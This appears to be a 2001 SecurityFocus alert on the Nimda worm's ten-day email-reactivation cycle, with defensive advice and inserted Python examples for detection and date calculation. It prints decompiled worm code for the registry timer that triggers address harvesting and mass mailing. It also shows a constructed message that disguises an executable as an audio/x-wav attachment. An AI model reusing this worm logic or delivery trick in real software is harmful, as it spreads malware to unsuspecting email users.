Nimda Reactivation Alert
Analysts:
Oliver Friedrichs, Elias Levy, Andrew Mackie,
Jensenne Roculan, Ryan Russell, and Mario Van Velzen
Incident Analysis Alert
Version 1
Executive Summary
The ARIS analyst team believes that some functionality of the Nimda worm may become active again beginning on the evening of September 27 in North America. Analysis of the functions present within the worm has exposed program code that causes portions of the worm to reactivate in ten-day cycles. At the end of the ten-day cycle that begins with the initial infection of a host by the Nimda worm, the email infection vector is triggered, and the worm again attempts to propagate using email.
A number of factors diminish the impact of the Nimda worm's reactivation. The primary factor is that the worm must still be active in the wild for it to reactivate at the end of the ten-day cycle. We believe that this is currently the case.
A second factor is that other portions of the worm do not lie dormant during this time. All other infection vectors appear to continue to operate normally during this period. It is unlikely that the presence of the worm can be overlooked on an infected system, due to the other infection vectors being active.
The release of antivirus software updates by most leading antivirus vendors also diminishes the impact of the second wave of propagation attempts.
Due to these factors, we believe that this second wave of Nimda worm activity will be less significant than the original, but because a second wave is still possible, we recommend corrective action.
Action Items
! Apply the appropriate patches supplied by Microsoft.
! Check for DAT updates from the appropriate antivirus vendor to update antivirus software so your system can detect instances of this worm.
! Configure appropriate security permissions on network shares.
! Follow the steps and measures outlined in the original Nimda worm analysis available at
Associated Vulnerabilities:
  Microsoft IIS and PWS Extended Unicode Directory Traversal Vulnerability
  Microsoft IE MIME Header Attachment Execution Vulnerability
  Microsoft IIS/PWS Escaped Characters Decoding Command Execution Vulnerability
  Microsoft Office 2000 DLL Execution Vulnerability
Associated Bugtraq IDs: 1806, 2524, 2708, 1699
Urgency: High
Ease of Exploit: Automatic
Associated Operating Systems: Microsoft Windows 95, 98, ME, NT, 2000
Technical Overview
The email propagation vector in the Nimda worm performs a series of operations that cause it to reactivate ten days after the initial infection. Since the initial infections began as early as 03:00 GMT on September 18, we believe that a second wave of Nimda email propagation could begin as early as Friday, September 28 GMT, or the evening of Thursday, September 27 in North America.
Upon initial infection, the Nimda worm opens (creating it if necessary) the following registry key, under which it keeps a DWORD value named Cache:
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MapMail
If the key did not already exist, the worm stores a number derived from the current year, month, and day (computed from the UTC system time as year*365 + month*30 + day) in Cache and executes the email infection vector. On later executions of the worm, the stored value is compared with the current day count, and the email infection vector executes only when the stored value plus ten is strictly less than the current count; because of the strict comparison and the 30-day months in the encoding, the earliest qualifying day is the eleventh after the stored one, drifting by a day or two across month boundaries. The worm then overwrites Cache with the current count, so that the vector fires again in further ten-day increments.
The worm sends itself in a specially crafted email containing an "audio/x-wav" MIME attachment. The attachment is an executable called "readme.exe." It is automatically executed if the message is viewed in the preview pane of Outlook or Outlook Express on a system where Internet Explorer is vulnerable to the MIME Header Attachment Execution vulnerability; Outlook and Outlook Express are affected because they use Internet Explorer components to render HTML messages.
Nimda uses several techniques to increase the effectiveness of its email propagation. First, it generates a list of email addresses from the Internet Explorer browser cache and the default MAPI mailbox (usually the Inbox for Outlook or Outlook Express). It also caches the subjects of the messages found in the MAPI mailbox. It then picks one harvested address at random to be the source of the emails it sends. Nimda also includes its own SMTP client, which contacts the appropriate mail servers for the various targets. Because of the way addresses are harvested, Nimda often generates invalid addresses. When such an email bounces at the remote server, the person whose address was placed in the "From:" field receives a message indicating that an email containing the virus was bounced. This behavior often led people to incorrectly assume that they were infected, and will likely continue to do so.
The Nimda worm contains a bug in the code that collects email subject lines. It appears that, in some cases, the MAPI call returns a long "sampledesktopsampledesktop . . ." subject line that causes a buffer overflow. This results in long or bizarre subject lines, and could also potentially result in access violations that kill the worm.
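The delivery trick described above (an executable attachment declared as "audio/x-wav" so that a vulnerable preview pane renders it) can be caught at the mail gateway by comparing what a MIME part says it is with what its name and bytes say. The following is an added example, not code from the original alert: the sample message is constructed here (the example.com/example.net addresses, the "readme-part" Content-ID and the extension and inline-type lists are ours), and the attachment body is a stand-in carrying only a PE "MZ" header, not the worm.

```python
"""Flag MIME parts whose declared Content-Type would be rendered inline while
their filename or bytes identify an executable. Added example; the message
below is constructed for it and is not a captured Nimda sample."""
import base64
import email

# Extensions a Windows host executes on open (our list, not from the alert).
EXEC_EXTS = (".exe", ".com", ".scr", ".pif", ".bat", ".vbs")
# Declared types the alert's text identifies as rendered automatically by the
# preview pane; audio/x-wav is the one Nimda used, the others are assumptions.
INLINE_TYPES = {"audio/x-wav", "audio/x-midi", "image/gif", "image/jpeg"}
# Types under which an executable is at least honestly labelled.
EXEC_TYPES = {"application/octet-stream", "application/x-msdownload"}

# Constructed stand-in payload: a PE header and nothing else.
_B64_PE_STUB = base64.b64encode(b"MZ" + b"\x00" * 62).decode()

SAMPLE = b"""From: someone@example.com
To: victim@example.net
Subject: sampledesktop
MIME-Version: 1.0
Content-Type: multipart/related; boundary="====_OUTER_===="

--====_OUTER_====
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML><BODY><iframe src=3Dcid:readme-part height=3D0 width=3D0></iframe></BODY></HTML>

--====_OUTER_====
Content-Type: audio/x-wav; name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <readme-part>

""" + _B64_PE_STUB.encode() + b"""

--====_OUTER_====--
"""

CLEAN = b"""From: someone@example.com
To: victim@example.net
Subject: quarterly numbers
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"

Nothing to see here.
"""


def suspicious_attachments(raw: bytes) -> list:
    """Return one finding per non-container MIME part that looks executable.

    A part is executable if its filename has an executable extension or its
    decoded body starts with the PE 'MZ' signature. 'mislabelled' records
    whether the declared Content-Type hides that; 'inline' whether the type is
    one a preview pane renders without asking."""
    findings = []
    for part in email.message_from_bytes(raw).walk():
        if part.is_multipart():
            continue
        ctype = part.get_content_type()
        name = part.get_filename() or ""       # falls back to the name= param
        body = part.get_payload(decode=True) or b""
        reasons = []
        if name.lower().endswith(EXEC_EXTS):
            reasons.append("executable filename")
        if body[:2] == b"MZ":
            reasons.append("PE header in body")
        if reasons:
            findings.append({
                "filename": name,
                "content_type": ctype,
                "mislabelled": ctype not in EXEC_TYPES,
                "inline": ctype in INLINE_TYPES,
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for label, msg in (("constructed Nimda-style message", SAMPLE), ("clean message", CLEAN)):
        print(label, "->", suspicious_attachments(msg) or "no findings")
```

The check keys on the attachment's bytes and name rather than on the declared type alone, so renaming the payload or choosing a different inline media type does not evade it; the quoted-printable HTML part is decoded and examined the same way and produces no finding.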
Source Code Analysis
The following is an analysis of the Nimda worm code that led to the release of this alert. The listing below (recovered from the worm binary; procedure addresses are given in the comments) implements the ten-day cycle.
    /* Procedure: 0x3617548D - 0x3617558A */
    int EmailVector(void)
    {
        SYSTEMTIME st;
        DWORD saved_days;              /* Cache value read back from the registry */
        DWORD dwDisposition;
        DWORD modified = 0;            /* set when Cache was (re)written: run the vector */
        DWORD days;                    /* today's pseudo-day count */
        DWORD len = sizeof(DWORD);
        HKEY  hKey;

        GetSystemTime(&st);            /* UTC, not local time */
        /* Not a real day count: 30-day months, 365-day years */
        days = (st.wYear * 365) + (st.wMonth * 30) + st.wDay;

        /* Open the key, creating it if necessary.
           -2147483647 == 0x80000001 == HKEY_CURRENT_USER
           983103 == KEY_ALL_ACCESS, 0 == REG_OPTION_NON_VOLATILE */
        if (RegCreateKeyExA(HKEY_CURRENT_USER,
                "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MapMail",
                0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL,
                &hKey, &dwDisposition) == ERROR_SUCCESS)
        {
            /* REG_OPENED_EXISTING_KEY == 2 */
            if (dwDisposition != REG_OPENED_EXISTING_KEY) {
                /* Key did not exist (first infection): record today's count.
                   REG_DWORD == 4, ERROR_SUCCESS == 0 */
                if (RegSetValueExA(hKey, "Cache", 0, REG_DWORD,
                                   (const BYTE *)&days, len) == ERROR_SUCCESS) {
                    modified = 1;
                }
            } else {
                /* Key existed: read the stored count. The call on this line is
                   missing from the recovered listing and is reconstructed from
                   the identical RegQueryValueExA call in DoEmailVector() below. */
                if (RegQueryValueExA(hKey, "Cache", 0, NULL,
                                     (LPBYTE)&saved_days, &len) == ERROR_SUCCESS) {
                    /* Strictly more than ten pseudo-days since the stored value:
                       store today's count as the new base and fire the vector */
                    if (saved_days + 10 < days) {
                        RegSetValueExA(hKey, "Cache", 0, REG_DWORD,
                                       (const BYTE *)&days, len);
                        modified = 1;
                    }
                } else {
                    /* Value unreadable: initialise it; the vector does not run */
                    RegSetValueExA(hKey, "Cache", 0, REG_DWORD,
                                   (const BYTE *)&days, len);
                }
            }
            RegCloseKey(hKey);
        }
        *L3617D664 = 0;                /* global in the worm image, cleared here */
        if (modified) {
            DoEmailVector();
        }
        return 1;
    }

    /* Procedure: 0x3617558B */
    int DoEmailVector(void)
    {
        char  buff[1024];
        DWORD len = sizeof(buff);
        HKEY  hKey;

        /* -2147483647 == 0x80000001 == HKEY_CURRENT_USER
           983103 == KEY_ALL_ACCESS, ERROR_SUCCESS == 0 */
        if (RegOpenKeyExA(HKEY_CURRENT_USER,
                "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders",
                0, KEY_ALL_ACCESS, &hKey) == ERROR_SUCCESS)
        {
            /* "Cache" here is the user's Temporary Internet Files folder */
            RegQueryValueExA(hKey, "Cache", 0, NULL, (LPBYTE)buff, &len);
            RegCloseKey(hKey);
            GetEmailAddressFromWebCache(buff);
        }
        GetEmailAddressFromMAPI();
        SendEmail();
        return 1;
    }
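The date arithmetic of EmailVector() above, and the ten-day cycle described in the Technical Overview, reproduced in Python as an added example (not part of the original alert or of the worm listing). It lets a responder take the MapMail\Cache DWORD recovered from an infected host, recover the date it encodes, and compute the first day on which the strict comparison in the listing holds again. It assumes only what the listing shows: the value is year*365 + month*30 + day taken from the UTC system time, and the test is saved + 10 < today.

```python
"""Nimda email-vector timing, reconstructed from the EmailVector() listing.
Added example: the functions and their names are ours, the arithmetic is the
worm's. All dates are UTC because the worm calls GetSystemTime."""
from datetime import date, timedelta


def nimda_days(d: date) -> int:
    """The pseudo-day count the worm stores in MapMail\\Cache."""
    return d.year * 365 + d.month * 30 + d.day


def email_vector_fires(saved: int, today: date) -> bool:
    """The listing's trigger test, including its strict '<'."""
    return saved + 10 < nimda_days(today)


def next_trigger(saved: int, start: date) -> date:
    """First calendar day on or after `start` on which a run of the worm
    would fire the email vector and overwrite Cache with that day's count."""
    d = start
    while not email_vector_fires(saved, d):
        d += timedelta(days=1)
    return d


def decode_cache(saved: int, year_hint: int) -> list:
    """Calendar dates that encode to `saved`, searched around `year_hint`.

    The encoding is not one-to-one: with 30-day months, the 31st of a month
    and the 1st of the next produce the same value, so every match is
    returned rather than a single guess made by integer division."""
    d = date(year_hint - 1, 1, 1)
    end = date(year_hint + 1, 12, 31)
    hits = []
    while d <= end:
        if nimda_days(d) == saved:
            hits.append(d)
        d += timedelta(days=1)
    return hits


if __name__ == "__main__":
    # First infections were seen at 03:00 GMT on September 18 (from the alert).
    saved = nimda_days(date(2001, 9, 18))
    print("Cache value written on 2001-09-18:", saved)
    print("Dates that decode to it:", decode_cache(saved, 2001))
    print("First day the vector fires again:", next_trigger(saved, date(2001, 9, 18)))
    # A month boundary stretches the interval: infection on Aug 25 fires on Sep 6.
    aug = nimda_days(date(2001, 8, 25))
    print("Aug 25 infection next fires:", next_trigger(aug, date(2001, 8, 25)))
```

Run for a September 18 infection, the test first holds on September 29 GMT (the evening of September 28 in North America), one day after the headline date, because the comparison is strict; and the vector only fires if the worm actually executes on such a day, since the check runs at each execution rather than on a timer. decode_cache returns a list because, for example, January 31 and February 1 encode to the same value.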
Attack Data
Figure 1 depicts the dramatic rise in attack activity triggered by Nimda beginning at 03:00 GMT on September 18. This data, when combined with the ten-day cycle, leads to the prediction that propagation via the email infection vector will resume beginning at 03:00 GMT on September 28, or the evening of September 27 in North America.

Attack                                                                  % Users   # Attacks
Generic "../" Directory Traversal Attack                                  27.93      480866
Microsoft IIS/PWS Escaped Characters Decoding Command Execution Attack    24.32      201671
Microsoft IIS 4.0/5.0 Extended UNICODE Directory Traversal Attack         17.12      125537
Microsoft IIS 4.0/5.0 File Permission Canonicalization Attack             11.71       29126
Generic HTTP Directory Traversal Attack                                    9.91       22760
Glossary
If you are unfamiliar with any term used in this report, please visit the SecurityFocus glossary at http://www.securityfocus.com/glossary/index.html for more details on information security terminology.
Contact Information
Corporate Headquarters
SecurityFocus
1660 S. Amphlett Blvd., Suite 128 San Mateo, CA 94402 USA
650-655-6300 (tel) 650-655-2099 (fax)
Canadian Office
100-4th Avenue S.W., Suite 710 Calgary, AB, T2P 3N2 Canada 403-213-3939 (tel)
403-233-9179 (fax)
The ARIS predictor service provides Incident Alert and Analysis Reports, as well as Weekly and Monthly Summary Reports. These reports draw on IDS log data contributed to the SecurityFocus Incidents Database by ARIS analyzer members. Members submit this log data to the Incidents Database voluntarily and often anonymously. While SecurityFocus experts make every effort to inspect this data for validity, SecurityFocus does not guarantee the accuracy of submitted data. SecurityFocus uses the aggregated log information to detect trends and provides it to customers AS IS. Should you have questions, please contact [email protected].